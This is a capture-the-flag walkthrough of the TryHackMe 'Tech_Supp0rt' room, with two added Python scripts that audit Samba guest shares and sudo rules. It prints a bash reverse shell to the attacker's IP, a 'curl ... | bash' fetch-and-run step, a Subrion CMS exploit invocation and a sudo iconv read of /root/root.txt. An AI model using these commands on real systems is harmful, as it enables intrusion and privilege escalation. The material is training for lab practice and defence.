Hack into the machine and investigate the target.
Please allow about 5 minutes for the machine to fully boot!
Note: The theme and security warnings encountered in this room are part of the challenge.
To start off I want to give a huge shout out to my source here. Whenever I was stuck I would refer back to this walkthrough, so please show him love and check it out!!!!!!!
Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890
How to: To start off, make sure you have the machine booted up, and once it has booted copy the IP address of the target machine. If you are not using the AttackBox, make sure your VM is connected to the TryHackMe OpenVPN. You can do this by changing into the folder that holds your .ovpn file and running the command sudo openvpn [name of the file.ovpn]. This will get you connected and able to work with the target machine.
Now that you are connected to the TryHackMe VPN and have the IP address of the target machine, it is time to do some recon. Let's start off with an nmap scan. The scan I ran was nmap -A [IP of target machine]; the -A flag enables OS detection, version detection, script scanning, and traceroute. Here are the results of our nmap scan:
We can see that ports 22, 80, 139, and 445 are open. The next scan to run would be smbmap; run it with smbmap -H [IP of target machine] -P 139, where -H sets the host and -P sets the port. Here are the results of the smbmap scan:
So as you can see the websvr share is read only, so we might be able to take a peek inside. Let us try using smbclient //[IP of target machine]/websvr. When prompted for a password leave it blank and hit enter. Now we are in the SMB share; you can list its contents with the command ls, and we see an interesting file called enter.txt. We can download the file by using the command get enter.txt. This will copy it over to your current directory. You can now type exit at the smbclient prompt to leave. Now use the command cat enter.txt to view the text file.
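The websvr share above was readable with a blank password. On the Samba side that behaviour comes from "guest ok = yes" on the share (helped along by a permissive "map to guest" in [global]). The following audit script is an added example, not part of this walkthrough or of the room; both smb.conf texts in it are constructed, and the share path and the @webadmins group are assumptions. It parses an smb.conf and lists every share the guest account can reach, so the weak config and the hardened one can be compared side by side.

```python
"""Audit smb.conf for shares that can be read without credentials.

Added example, not part of the walkthrough: the websvr share accepted a
blank password, which is what "guest ok = yes" (plus a permissive
"map to guest") produces in Samba. Both configs below are constructed; the
path and the @webadmins group are assumptions.
"""
import configparser

TRUE = {"yes", "true", "1"}

# Constructed weak config: anyone can list and read websvr anonymously.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[websvr]
   path = /srv/samba/websvr
   guest ok = yes
   read only = yes
"""

# Constructed hardened config: guest access off, share limited to a group.
FIXED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Never

[websvr]
   path = /srv/samba/websvr
   guest ok = no
   valid users = @webadmins
   read only = yes
"""


def _flag(section, key, default):
    """Read a Samba boolean option ("yes"/"no") from a parsed section."""
    return section.get(key, default).strip().lower() in TRUE


def parse_smb_conf(text):
    """Parse smb.conf text; Samba option names may contain spaces ("guest ok")."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    cp.read_string(text)
    return cp


def audit_smb_conf(text):
    """Return {share: details} for every share reachable as the guest account."""
    cp = parse_smb_conf(text)
    map_to_guest = "never"
    if cp.has_section("global"):
        map_to_guest = cp["global"].get("map to guest", "never").strip().lower()
    findings = {}
    for share in cp.sections():
        if share == "global":
            continue
        sec = cp[share]
        # "public" is the legacy synonym for "guest ok"; "guest only" implies it.
        guest = (_flag(sec, "guest ok", sec.get("public", "no"))
                 or _flag(sec, "guest only", "no"))
        if not guest:
            continue
        # Samba defaults to read only; "writable = yes" flips that.
        writable = _flag(sec, "writable", "no") or not _flag(sec, "read only", "yes")
        findings[share] = {
            "anonymous": True,
            "writable": writable,
            "map_to_guest": map_to_guest,
        }
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("fixed", FIXED_SMB_CONF)):
        print(label, audit_smb_conf(conf))
```

Run it against a real /etc/samba/smb.conf by passing the file contents to audit_smb_conf; an empty result means no share is reachable as guest. Even a read-only anonymous share is a finding here, because, as enter.txt shows, a readable share is enough to leak credentials.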
This gives us some good info and a hint. For the Subrion creds it says cooked with a magical formula; that's the hint. If you go to https://gchq.github.io/CyberChef/ , copy the Subrion creds and paste them into CyberChef, you will see a magic wand next to the output. Click on the magic wand and it will give you the Subrion password, which is:
So now we can hold that credential in our back pocket for now. Next we can run another scan to check for hidden directories on the web server; we can do this by running Gobuster. If you don't have Gobuster on your machine you can get it here (https://github.com/OJ/gobuster). Once you have it you can run it with this command: gobuster dir -u [IP of target machine] -w /usr/share/dirb/wordlists/common.txt -t 4. The dir is for directory mode, -u sets the URL, -w sets the wordlist, and -t sets how many threads you will use. Here are the results of the Gobuster scan:
Now we have some of the server directories and we have a password, so let's see where we can get to. If you look at the enter.txt file that we got from the SMB share, it says to fix the Subrion site and edit from the panel. We can try this by opening up Firefox and typing in [IP of Target Machine]/subrion/panel/, which should take you to a login panel where we can put in the creds we got from enter.txt. Here is a picture of the login panel site:
Now that we are inside, if you look at the bottom left you will see the version of Subrion CMS that is running. The version is Subrion CMS v4.2.1, so we can search to see if there are any exploits we can use. We can start with searchsploit. I ran the command searchsploit subrion cms 4.2.1 and got back 4 results.
I went with the second one, and to find the full path I ran the command searchsploit php/webapps/49876.py -p and got back the path /usr/share/exploitdb/exploits/php/webapps/49876.py. I can now cp it over to my current directory with the command sudo cp /usr/share/exploitdb/exploits/php/webapps/49876.py /home/[username]; we use sudo since it is in a root-owned area that requires root privileges to copy from. Now that we have the file copied over to our current directory we can run it against the server using the following command: python3 49876.py -u http://[IP of Target Machine]/subrion/panel/ -l admin -p Hidden. The -u sets the URL, the -l sets the user and -p sets the password. Once this has run you should have a webshell on the Subrion server:
So my next move was to try and upload linpeas to the server to see what weaknesses it had. I started a Python simple HTTP server and tried to curl over linpeas, but it kept giving me errors, so my next move was to go into the web panel and upload it that way. Once you have logged in you can click on Content and then on Uploads. You will see a floppy disk icon in Uploads that you can use to upload a file. This is how I uploaded linpeas.
Once it is in there, run the command chmod 777 linpeas.sh; this will make linpeas executable on the system (chmod +x would be enough for that; 777 also makes the file world-writable). Then use the command ./linpeas.sh. You won't see anything going on and may think that it froze, but it is running and will take a minute. When it is finished you will have a wealth of knowledge about the server; one thing that was found looks like the password to the WordPress site:
Also in the linpeas scan you will find some programs you can run on this system and two users:
So then I created a simple reverse shell script with nano shell.sh and put in it bash -i >& /dev/tcp/[IP of Attack Machine]/4444 0>&1. Make sure you have nc listening and the Python simple HTTP server serving the file. First the nc listener on your attack machine for the callback; I did this with the command nc -lnvp 4444:
Then the Python simple HTTP server can be run with the command python -m SimpleHTTPServer; the -m runs a library module as a script:
From there, on the target machine run the command curl [IP of Attack Machine]:8000/shell.sh | bash. This will fetch the script and run it on the target machine, calling back to the nc listener we started on our attack machine:
Now that we have a reverse shell, I made my way to the tmp folder using cd /tmp, then checked to see if python was on this machine with the command which python:
Now it's time to upgrade our shell so we can run commands like sudo and su. To do this you will need to run this python command: python -c 'import pty;pty.spawn("/bin/bash")'. This will allow you to run more commands on the system. Now we can use su scamsite to see if we can move over to that user. Once we run su scamsite it will prompt for a password, so we can try the ones we know already (these are hidden and you must do the room to find them). The second password worked and we are now scamsite!
I ran the sudo -l command to see what can be run through scamsite:
Then once I saw that iconv could be run I went to GTFOBins to see how I could use it:
So after trying and failing at it a couple of times I tried sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt", and it worked!!!! I got the flag, copied it over and pasted it into TryHackMe.
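The reason the last step works is that the sudoers rule lets scamsite run iconv as root with whatever arguments it likes, and iconv will happily copy any readable file to its output. The audit script below is an added example, not part of this walkthrough or the room: it parses sudo -l output, extracts each rule, and flags full ALL grants, NOPASSWD rules, and file-handling tools granted without pinned arguments. The sudo -l texts are constructed (the hostname and exact rule wording are assumptions); only the binary, iconv, comes from the walkthrough.

```python
"""Parse `sudo -l` output and flag rules that hand out more than intended.

Added example, not part of the walkthrough: the sudoers entry that let
scamsite run iconv as root is the kind of rule this audit is meant to catch.
The outputs below are constructed (hostname and exact rule text are
assumptions); only the binary, iconv, comes from the walkthrough.
"""
import re
from pathlib import PurePosixPath

# Binaries that, run as root with caller-chosen arguments, read or write any
# file. Seeded with the walkthrough's case; extend from your own policy.
ARBITRARY_FILE_TOOLS = {"iconv"}

# One sudo -l rule line: "(runas) TAG: TAG: cmd, cmd"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Constructed: what `sudo -l` might print for the compromised account.
WEAK_SUDO_L = """\
Matching Defaults entries for scamsite on target-host:
    env_reset, mail_badpass

User scamsite may run the following commands on target-host:
    (ALL) NOPASSWD: /usr/bin/iconv
"""

# Constructed: the same intent with the arguments pinned and a password required.
FIXED_SUDO_L = """\
User scamsite may run the following commands on target-host:
    (root) /usr/bin/iconv -f 8859_1 -t UTF-8 /var/www/html/index.html
"""


def parse_sudo_l(output):
    """Return [{runas, tags, cmds}] for each rule line after the 'may run' header."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmds": cmds})
    return rules


def assess(rules):
    """Return (command, code) findings: ALL, NOPASSWD, UNRESTRICTED_FILE_TOOL."""
    findings = []
    for rule in rules:
        for cmd in rule["cmds"]:
            words = cmd.split()
            if words[0] == "ALL":
                findings.append((cmd, "ALL"))
                continue
            if "NOPASSWD" in rule["tags"]:
                findings.append((cmd, "NOPASSWD"))
            # A bare path means sudoers lets the caller choose every argument.
            if PurePosixPath(words[0]).name in ARBITRARY_FILE_TOOLS and len(words) == 1:
                findings.append((cmd, "UNRESTRICTED_FILE_TOOL"))
    return findings


def audit_sudo_l(output):
    """Convenience wrapper: parse then assess."""
    return assess(parse_sudo_l(output))


if __name__ == "__main__":
    print("weak :", audit_sudo_l(WEAK_SUDO_L))
    print("fixed:", audit_sudo_l(FIXED_SUDO_L))
```

The fix shown in FIXED_SUDO_L is the standard sudoers remedy: pin the full argument list so the rule covers one operation rather than one binary, and drop NOPASSWD unless there is a reason for it. Run the wrapper over the output of sudo -l -U <user> for each account that has any sudo rights at all.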
Again, huge shout out to my source here. Whenever I was stuck I would refer back to this walkthrough, so please show him love and check it out!!!!!!!
Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890
Answer the questions below
What is the root.txt flag?
Answer: You won't get it that easily!!!
From <https://tryhackme.com/room/techsupp0rt1>